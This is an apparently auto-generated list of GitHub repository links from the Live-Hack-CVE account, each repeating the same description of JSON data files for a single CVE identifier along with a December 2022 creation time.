**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44678 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44678](https://github.com/Live-Hack-CVE/CVE-2022-44678) create time: 2022-12-22T21:15:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41561](https://github.com/Live-Hack-CVE/CVE-2022-41561) create time: 2022-12-22T21:15:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41563 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41563](https://github.com/Live-Hack-CVE/CVE-2022-41563) create time: 2022-12-22T21:15:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41562 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41562](https://github.com/Live-Hack-CVE/CVE-2022-41562) create time: 2022-12-22T21:15:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44696 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44696](https://github.com/Live-Hack-CVE/CVE-2022-44696) create time: 2022-12-22T21:14:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44695 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44695](https://github.com/Live-Hack-CVE/CVE-2022-44695) create time: 2022-12-22T21:14:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44693 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44693](https://github.com/Live-Hack-CVE/CVE-2022-44693) create time: 2022-12-22T21:14:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44692 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44692](https://github.com/Live-Hack-CVE/CVE-2022-44692) create time: 2022-12-22T21:14:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44691 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44691](https://github.com/Live-Hack-CVE/CVE-2022-44691) create time: 2022-12-22T21:14:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46072 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46072](https://github.com/Live-Hack-CVE/CVE-2022-46072) create time: 2022-12-22T21:14:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46071 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46071](https://github.com/Live-Hack-CVE/CVE-2022-46071) create time: 2022-12-22T21:14:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46074 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46074](https://github.com/Live-Hack-CVE/CVE-2022-46074) create time: 2022-12-22T21:14:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46073 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46073](https://github.com/Live-Hack-CVE/CVE-2022-46073) create time: 2022-12-22T21:14:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46127 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46127](https://github.com/Live-Hack-CVE/CVE-2022-46127) create time: 2022-12-22T21:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46126](https://github.com/Live-Hack-CVE/CVE-2022-46126) create time: 2022-12-22T21:13:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46125 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46125](https://github.com/Live-Hack-CVE/CVE-2022-46125) create time: 2022-12-22T21:13:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46124 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46124](https://github.com/Live-Hack-CVE/CVE-2022-46124) create time: 2022-12-22T21:13:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46123](https://github.com/Live-Hack-CVE/CVE-2022-46123) create time: 2022-12-22T21:13:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46122 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46122](https://github.com/Live-Hack-CVE/CVE-2022-46122) create time: 2022-12-22T21:13:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46121 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46121](https://github.com/Live-Hack-CVE/CVE-2022-46121) create time: 2022-12-22T21:13:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46120 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46120](https://github.com/Live-Hack-CVE/CVE-2022-46120) create time: 2022-12-22T21:13:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-20018 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-20018](https://github.com/Live-Hack-CVE/CVE-2016-20018) create time: 2022-12-22T19:40:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-20180 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-20180](https://github.com/Live-Hack-CVE/CVE-2019-20180) create time: 2022-12-22T19:36:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-25078 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-25078](https://github.com/Live-Hack-CVE/CVE-2019-25078) create time: 2022-12-22T19:35:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36607 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36607](https://github.com/Live-Hack-CVE/CVE-2020-36607) create time: 2022-12-22T20:16:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-20589 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-20589](https://github.com/Live-Hack-CVE/CVE-2020-20589) create time: 2022-12-22T20:16:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36617 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36617](https://github.com/Live-Hack-CVE/CVE-2020-36617) create time: 2022-12-22T20:16:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36619 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36619](https://github.com/Live-Hack-CVE/CVE-2020-36619) create time: 2022-12-22T19:39:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36618](https://github.com/Live-Hack-CVE/CVE-2020-36618) create time: 2022-12-22T19:39:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21219 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21219](https://github.com/Live-Hack-CVE/CVE-2020-21219) create time: 2022-12-22T19:35:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36573 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36573](https://github.com/Live-Hack-CVE/CVE-2021-36573) create time: 2022-12-22T20:16:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-46848 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-46848](https://github.com/Live-Hack-CVE/CVE-2021-46848) create time: 2022-12-22T20:16:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4249 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4249](https://github.com/Live-Hack-CVE/CVE-2021-4249) create time: 2022-12-22T20:16:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4253 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4253](https://github.com/Live-Hack-CVE/CVE-2021-4253) create time: 2022-12-22T20:15:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4251 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4251](https://github.com/Live-Hack-CVE/CVE-2021-4251) create time: 2022-12-22T20:15:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4250](https://github.com/Live-Hack-CVE/CVE-2021-4250) create time: 2022-12-22T20:15:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4257 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4257](https://github.com/Live-Hack-CVE/CVE-2021-4257) create time: 2022-12-22T20:15:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4256 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4256](https://github.com/Live-Hack-CVE/CVE-2021-4256) create time: 2022-12-22T20:15:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4255](https://github.com/Live-Hack-CVE/CVE-2021-4255) create time: 2022-12-22T20:15:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4254 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4254](https://github.com/Live-Hack-CVE/CVE-2021-4254) create time: 2022-12-22T20:15:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4252 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4252](https://github.com/Live-Hack-CVE/CVE-2021-4252) create time: 2022-12-22T20:15:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22926 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22926](https://github.com/Live-Hack-CVE/CVE-2021-22926) create time: 2022-12-22T20:14:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22925 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22925](https://github.com/Live-Hack-CVE/CVE-2021-22925) create time: 2022-12-22T20:14:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22923 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22923](https://github.com/Live-Hack-CVE/CVE-2021-22923) create time: 2022-12-22T20:14:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22922 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22922](https://github.com/Live-Hack-CVE/CVE-2021-22922) create time: 2022-12-22T20:14:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22945 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22945](https://github.com/Live-Hack-CVE/CVE-2021-22945) create time: 2022-12-22T20:14:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22947 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22947](https://github.com/Live-Hack-CVE/CVE-2021-22947) create time: 2022-12-22T20:14:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-22946 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-22946](https://github.com/Live-Hack-CVE/CVE-2021-22946) create time: 2022-12-22T20:14:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43527 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43527](https://github.com/Live-Hack-CVE/CVE-2021-43527) create time: 2022-12-22T20:14:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4262 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4262](https://github.com/Live-Hack-CVE/CVE-2021-4262) create time: 2022-12-22T19:39:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4260](https://github.com/Live-Hack-CVE/CVE-2021-4260) create time: 2022-12-22T19:39:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4259 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4259](https://github.com/Live-Hack-CVE/CVE-2021-4259) create time: 2022-12-22T19:39:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4258 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4258](https://github.com/Live-Hack-CVE/CVE-2021-4258) create time: 2022-12-22T19:39:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-4261 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-4261](https://github.com/Live-Hack-CVE/CVE-2021-4261) create time: 2022-12-22T19:37:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36572 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36572](https://github.com/Live-Hack-CVE/CVE-2021-36572) create time: 2022-12-22T19:37:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39427 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39427](https://github.com/Live-Hack-CVE/CVE-2021-39427) create time: 2022-12-22T19:36:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39428 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39428](https://github.com/Live-Hack-CVE/CVE-2021-39428) create time: 2022-12-22T19:36:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3437 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3437](https://github.com/Live-Hack-CVE/CVE-2021-3437) create time: 2022-12-22T19:34:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3919 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3919](https://github.com/Live-Hack-CVE/CVE-2021-3919) create time: 2022-12-22T19:33:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3661 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3661](https://github.com/Live-Hack-CVE/CVE-2021-3661) create time: 2022-12-22T19:33:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47208](https://github.com/Live-Hack-CVE/CVE-2022-47208) create time: 2022-12-22T20:17:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3166 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3166](https://github.com/Live-Hack-CVE/CVE-2022-3166) create time: 2022-12-22T20:17:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2966](https://github.com/Live-Hack-CVE/CVE-2022-2966) create time: 2022-12-22T20:17:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3157 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3157](https://github.com/Live-Hack-CVE/CVE-2022-3157) create time: 2022-12-22T20:17:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47411 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47411](https://github.com/Live-Hack-CVE/CVE-2022-47411) create time: 2022-12-22T20:17:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47410](https://github.com/Live-Hack-CVE/CVE-2022-47410) create time: 2022-12-22T20:17:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47409 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47409](https://github.com/Live-Hack-CVE/CVE-2022-47409) create time: 2022-12-22T20:16:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47408 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47408](https://github.com/Live-Hack-CVE/CVE-2022-47408) create time: 2022-12-22T20:16:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4410](https://github.com/Live-Hack-CVE/CVE-2022-4410) create time: 2022-12-22T20:16:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3190 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3190](https://github.com/Live-Hack-CVE/CVE-2022-3190) create time: 2022-12-22T20:16:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3275 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3275](https://github.com/Live-Hack-CVE/CVE-2022-3275) create time: 2022-12-22T20:16:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-1941 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-1941](https://github.com/Live-Hack-CVE/CVE-2022-1941) create time: 2022-12-22T20:16:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3171 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3171](https://github.com/Live-Hack-CVE/CVE-2022-3171) create time: 2022-12-22T20:16:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45061 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45061](https://github.com/Live-Hack-CVE/CVE-2022-45061) create time: 2022-12-22T20:16:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4583 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4583](https://github.com/Live-Hack-CVE/CVE-2022-4583) create time: 2022-12-22T20:16:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4607 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4607](https://github.com/Live-Hack-CVE/CVE-2022-4607) create time: 2022-12-22T20:15:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36227 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36227](https://github.com/Live-Hack-CVE/CVE-2022-36227) create time: 2022-12-22T20:15:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3500 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3500](https://github.com/Live-Hack-CVE/CVE-2022-3500) create time: 2022-12-22T20:14:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46288 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46288](https://github.com/Live-Hack-CVE/CVE-2022-46288) create time: 2022-12-22T20:14:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-46287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-46287](https://github.com/Live-Hack-CVE/CVE-2022-46287) create time: 2022-12-22T20:14:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44456 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-44456](https://github.com/Live-Hack-CVE/CVE-2022-44456) create time: 2022-12-22T20:14:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43486 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43486](https://github.com/Live-Hack-CVE/CVE-2022-43486) create time: 2022-12-22T20:14:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43466 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43466](https://github.com/Live-Hack-CVE/CVE-2022-43466) create time: 2022-12-22T20:14:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-43443 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-43443](https://github.com/Live-Hack-CVE/CVE-2022-43443) create time: 2022-12-22T20:14:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41993 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41993](https://github.com/Live-Hack-CVE/CVE-2022-41993) create time: 2022-12-22T20:14:35Z

